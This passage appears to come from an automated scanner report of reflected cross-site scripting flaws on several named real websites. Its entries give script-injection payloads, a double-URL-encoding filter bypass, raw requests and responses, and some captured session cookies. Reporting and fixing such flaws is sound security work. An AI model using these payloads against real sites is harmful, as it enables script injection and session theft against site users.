Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 17:46:21 GMT
Connection: close
Set-Cookie: PRODUCTCMPRODCAT=; Expires=Fri, 06-May-2011 17:46:21 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 17:46:21 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 17:46:21 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 17:46:21 GMT
Set-Cookie: PRODUCTCMPRODCAT=; Expires=Fri, 06-May-2011 17:46:21 GMT
Content-Length: 156935


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->
...[SNIP]...
<script language="javascript1.1" type="text/javascript">
   
       cmCreatePageviewTag("Dept: Level 1: Sports: Fitness Equipment: Abs & Waist","","10500ed2be";alert(1)//3e04ad354f9","");
   

//-->
...[SNIP]...

3.183. http://www.skymall.com/shopping/subdept.htm [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.skymall.com
Path:   /shopping/subdept.htm

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41b40"%3balert(1)//971f44b87cd was submitted in the c parameter. This input was echoed as 41b40";alert(1)//971f44b87cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shopping/subdept.htm?c=10296191641b40"%3balert(1)//971f44b87cd HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/dept.htm?c=10500
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; PRODUCTCMPRODCAT=; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496152997; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.2.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496223348; cmRS=&t1=1303494352983&t2=1303494355803&t3=1303494423347&t4=1303494352911&lti=1303494423347&ln=Outdoor%20Holiday%20Decor&hr=/shopping/subdept.htm%3Fc%3D102961916%26cm_re%3DInsideOutdoorLiving-_-OutdoorHolidayDecor-_-Image&fti=&fn=search%3A0%3Bjoinemail%3A1%3BselTpPkFrm%3A2%3B&ac=&fd=&uer=&fu=&pi=Dept%3A%20Level%201%3A%20Outdoor%20Living&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 17:48:12 GMT
Connection: close
Set-Cookie: PRODUCTCMPRODCAT=; Expires=Fri, 06-May-2011 17:48:09 GMT
Set-Cookie: PRODUCT203458153CMPRODCAT="10500: Promo"; Expires=Fri, 06-May-2011 17:48:09 GMT
Set-Cookie: PRODUCT203459330CMPRODCAT="10500: Promo"; Expires=Fri, 06-May-2011 17:48:09 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 17:48:12 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 17:48:12 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 17:48:12 GMT
Set-Cookie: brwshist_0=pid_203458153_; Expires=Sun, 21-Apr-2013 17:48:12 GMT
Set-Cookie: brwshist_1=pid_203459330_; Expires=Sun, 21-Apr-2013 17:48:12 GMT
Set-Cookie: PRODUCTCMPRODCAT=; Expires=Fri, 06-May-2011 17:48:12 GMT
Set-Cookie: PRODUCT203458153CMPRODCAT="10500: Promo"; Expires=Fri, 06-May-2011 17:48:12 GMT
Set-Cookie: PRODUCT203459330CMPRODCAT="10500: Promo"; Expires=Fri, 06-May-2011 17:48:12 GMT
Content-Length: 424025


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->
...[SNIP]...
<script language="javascript1.1" type="text/javascript">
   
       cmCreatePageviewTag("Dept: Level 2: : p1","","10296191641b40";alert(1)//971f44b87cd","");
   

//-->
...[SNIP]...

3.184. http://www.swiftpage1.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.swiftpage1.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 873a5%253cscript%253ealert%25281%2529%253c%252fscript%253ef27de3394b7 was submitted in the REST URL parameter 1. This input was echoed as 873a5<script>alert(1)</script>f27de3394b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.ico873a5%253cscript%253ealert%25281%2529%253c%252fscript%253ef27de3394b7 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swiftpage1.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 File Not Found
Date: Fri, 22 Apr 2011 15:22:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 592


               <html>
                   <head>
                       <title>404 File Not Found</title>
                   </head>
                   <body>
                       <H1>404 File Not Found</H1>
                       <br><br><br><br>
                       Full URL: http://www.swiftpage1.com/spe404.aspx?404;http://www.swiftpage1.com:80/favicon.ico873a5<script>alert(1)</script>f27de3394b7<br>
...[SNIP]...

3.185. http://www.swiftpage1.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.swiftpage1.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bbbe9<script>alert(1)</script>e263f3ff8a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?bbbe9<script>alert(1)</script>e263f3ff8a6=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swiftpage1.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 File Not Found
Date: Fri, 22 Apr 2011 15:22:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 592


               <html>
                   <head>
                       <title>404 File Not Found</title>
                   </head>
                   <body>
                       <H1>404 File Not Found</H1>
                       <br><br><br><br>
                       Full URL: http://www.swiftpage1.com/spe404.aspx?404;http://www.swiftpage1.com:80/favicon.ico?bbbe9<script>alert(1)</script>e263f3ff8a6=1<br>
...[SNIP]...

3.186. http://www.ubi.com/resources/scripts/sifr_init_js.aspx [path parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ubi.com
Path:   /resources/scripts/sifr_init_js.aspx

Issue detail

The value of the path request parameter is copied into the HTML document as plain text between tags. The payload ce345<script>alert(1)</script>25f446fe2ba was submitted in the path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/sifr_init_js.aspx?path=/resources/ce345<script>alert(1)</script>25f446fe2ba HTTP/1.1
Host: www.ubi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ad0whkvvbjyq5l552vkp0wqm

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 22 Apr 2011 15:34:44 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 831

/*
Author: AKQA
Date: 10-24-2008

This file supports the use of SIFR by dynamically setting the absolute path for whichever environment the application run on.

For example, development sites ru
...[SNIP]...
lopment sites,
this file will add "portal" to the src string.
*/

if (!(navigator.platform && navigator.platform == "MacPPC" && BrowserObject.Engine.gecko19)){
   var gotham = {
       src: '/resources/ce345<script>alert(1)</script>25f446fe2baassets/flash/gotham.swf'
   }

   sIFR.activate(gotham);

   sIFR.replace(gotham, {
       wmode:'transparent',
       forceWidth:true,
       selector: 'h1#global-header',
       css: {
           '.sIFR-root': {
               'font-
...[SNIP]...

3.187. http://www.ubi.com/resources/ubi_stylesheet_png.aspx [path parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ubi.com
Path:   /resources/ubi_stylesheet_png.aspx

Issue detail

The value of the path request parameter is copied into the HTML document as plain text between tags. The payload 9470d<script>alert(1)</script>3c4a6bfe622 was submitted in the path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/ubi_stylesheet_png.aspx?path=/resources/9470d<script>alert(1)</script>3c4a6bfe622 HTTP/1.1
Host: www.ubi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ad0whkvvbjyq5l552vkp0wqm

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 22 Apr 2011 15:34:02 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/css; charset=utf-8
Content-Length: 4590

/*
Author: AKQA
Date: 10-24-2008

This file supports the use of PNG files. Since IE6 requires PNG's to be absolutely specified, this file will programatically add the correct
information to the
...[SNIP]...
*/

/*=========== GLOBAL ============*/
#global-content-wrapper #side-column .wrapper div.divider{
   _background:none;
   _filter: progid:DXImageTransform.Microsoft.AlphaImageLoader (src='/resources/9470d<script>alert(1)</script>3c4a6bfe622images/style/global/divleftcolumn.png',sizingMethod='image');
}
#global-content-wrapper #side-column div#btn-submit-container a.button{
   _background:none;
   _filter: progid:DXImageTransform.Microsof
...[SNIP]...

3.188. http://www.blacksingles.com/favicon.ico [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.blacksingles.com
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6a87"%3balert(1)//2fec8277eb7 was submitted in the Referer HTTP header. This input was echoed as f6a87";alert(1)//2fec8277eb7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blacksingles.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=f6a87"%3balert(1)//2fec8277eb7

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:09:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: al-amho=; expires=Thu, 21-Apr-2011 16:09:20 GMT; path=/
Set-Cookie: al-juso=; expires=Thu, 21-Apr-2011 16:09:20 GMT; path=/
Set-Cookie: SparkUPS=; expires=Thu, 21-Apr-2011 16:09:20 GMT; path=/
Set-Cookie: OmnitureSessionCheck=2011-04-22 09:09:20Z; path=/
Set-Cookie: REG091202=REG091202&prm=55020&ScenarioFile=/Applications/Registration/XML/SplashRegistration_9051.xml&ScenarioName=Scenario 22&LAST_COMPLETED_STEP=0&CURRENT_STEP=1&SESSION_ID=e236421c-efa0-48f4-afab-9572cfe1e44e&START_STEP_ID=1; expires=Sun, 22-May-2011 16:09:20 GMT; path=/
Set-Cookie: mnc5=sid=e236421c-efa0-48f4-afab-9572cfe1e44e; domain=.BlackSingles.com; expires=Sun, 22-Apr-2012 16:09:20 GMT; path=/
Set-Cookie: mnc5_PromotionID=objname=PromotionID&sliding=False&val=66301&days=3&dateExp=4%2f25%2f2011+9%3a09%3a20+AM&hash=J3Qr8WUHO0pkpC1yMSV83Q%3d%3d; domain=.BlackSingles.com; expires=Mon, 25-Apr-2011 16:09:20 GMT; path=/
Set-Cookie: mnc5_Luggage=objname=Luggage&sliding=False&val=%3fhl%3den%26q%3df6a87%2522%253balert(1)%2f%2f2fec8277eb7&days=3&dateExp=4%2f25%2f2011+9%3a09%3a20+AM&hash=%2fdSOJfFbKXwxUCMVTERrZg%3d%3d; domain=.BlackSingles.com; expires=Mon, 25-Apr-2011 16:09:20 GMT; path=/
Cache-Control: no-store
Content-Type: text/html; charset=utf-8
Content-Length: 72170
Set-Cookie: NSC_wjq_hmpcbm.tqbsl.dpn_80=ffffffff43184f3445525d5f4f58455e445a4a423660;expires=Fri, 22-Apr-2011 16:11:20 GMT;path=/;httponly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7 no-js" xml:lang="en" lang=
...[SNIP]...
s.prop23 = (clearValue) ? "" : "";
s.prop24 = (clearValue) ? "" : "";
s.prop27 = (clearValue) ? "" : "";
s.prop29 = (clearValue) ? "" : "http://www.google.com/search?hl=en&q=f6a87";alert(1)//2fec8277eb7";
s.prop30 = (clearValue) ? "" : "";
s.prop31 = (clearValue) ? "" : "";
s.prop32 = (clearValue) ? "" : "";
s.prop33 = (clearValue) ? "" : "";
s.prop36 = (c
...[SNIP]...

3.189. http://www.palomar.edu/favicon.ico [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.palomar.edu
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload ebfcd<script>alert(1)</script>23b35df6fea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.palomar.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=ebfcd<script>alert(1)</script>23b35df6fea

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:06:51 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4692


<html>

<head>

<meta http-equiv="Content-Language" content="en-us">
<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
<meta name="ProgId" content="FrontPage.Editor.Document">

<titl
...[SNIP]...
<br>
                   REFERER -
                   http://www.google.com/search?hl=en&q=ebfcd<script>alert(1)</script>23b35df6fea
                   <hr width="85%" align="center">
...[SNIP]...

3.190. http://www.palomar.edu/favicon.ico [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.palomar.edu
Path:   /favicon.ico

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload e05ad<script>alert(1)</script>be5d4d0f272 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3e05ad<script>alert(1)</script>be5d4d0f272
Host: www.palomar.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:06:48 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4655


<html>

<head>

<meta http-equiv="Content-Language" content="en-us">
<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
<meta name="ProgId" content="FrontPage.Editor.Document">

<titl
...[SNIP]...
<br>
                   BROWSER -
                   curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3e05ad<script>alert(1)</script>be5d4d0f272
                   <br>
...[SNIP]...

3.191. https://www.salsalabs.com/dia/hq/css/custom.css [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.salsalabs.com
Path:   /dia/hq/css/custom.css

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a5e65'><script>alert(1)</script>f275fdc8f15 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /dia/hq/css/custom.css HTTP/1.1
Host: www.salsalabs.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=a5e65'><script>alert(1)</script>f275fdc8f15
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 15:27:07 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 1326

<div id="404container" class="error404">
<h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>


<p>It looks like you've requested a page that is cu
...[SNIP]...
<a href='http://www.google.com/search?hl=en&q=a5e65'><script>alert(1)</script>f275fdc8f15'>
...[SNIP]...

3.192. https://www.salsalabs.com/dia/hq/css/custom.css [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.salsalabs.com
Path:   /dia/hq/css/custom.css

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload aecea<script>alert(1)</script>73d9521b5ce was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /dia/hq/css/custom.css HTTP/1.1
Host: www.salsalabs.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=aecea<script>alert(1)</script>73d9521b5ce
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 15:27:07 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 1322

<div id="404container" class="error404">
<h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>


<p>It looks like you've requested a page that is cu
...[SNIP]...
</script>73d9521b5ce'>http://www.google.com/search?hl=en&q=aecea<script>alert(1)</script>73d9521b5ce</a>
...[SNIP]...

3.193. https://www.salsalabs.com/favicon.ico [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.salsalabs.com
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 7db98<script>alert(1)</script>5eea73835cc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
Host: www.salsalabs.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990
Referer: http://www.google.com/search?hl=en&q=7db98<script>alert(1)</script>5eea73835cc

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 15:27:09 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 1322

<div id="404container" class="error404">
<h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>


<p>It looks like you've requested a page that is cu
...[SNIP]...
</script>5eea73835cc'>http://www.google.com/search?hl=en&q=7db98<script>alert(1)</script>5eea73835cc</a>
...[SNIP]...

3.194. https://www.salsalabs.com/favicon.ico [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.salsalabs.com
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 889b4'><script>alert(1)</script>d9052bed70a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
Host: www.salsalabs.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990
Referer: http://www.google.com/search?hl=en&q=889b4'><script>alert(1)</script>d9052bed70a

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 15:27:08 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 1326

<div id="404container" class="error404">
<h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>


<p>It looks like you've requested a page that is cu
...[SNIP]...
<a href='http://www.google.com/search?hl=en&q=889b4'><script>alert(1)</script>d9052bed70a'>
...[SNIP]...

3.195. http://www.wiredforchange.com/favicon.ico [Referer HTTP header]

Summary

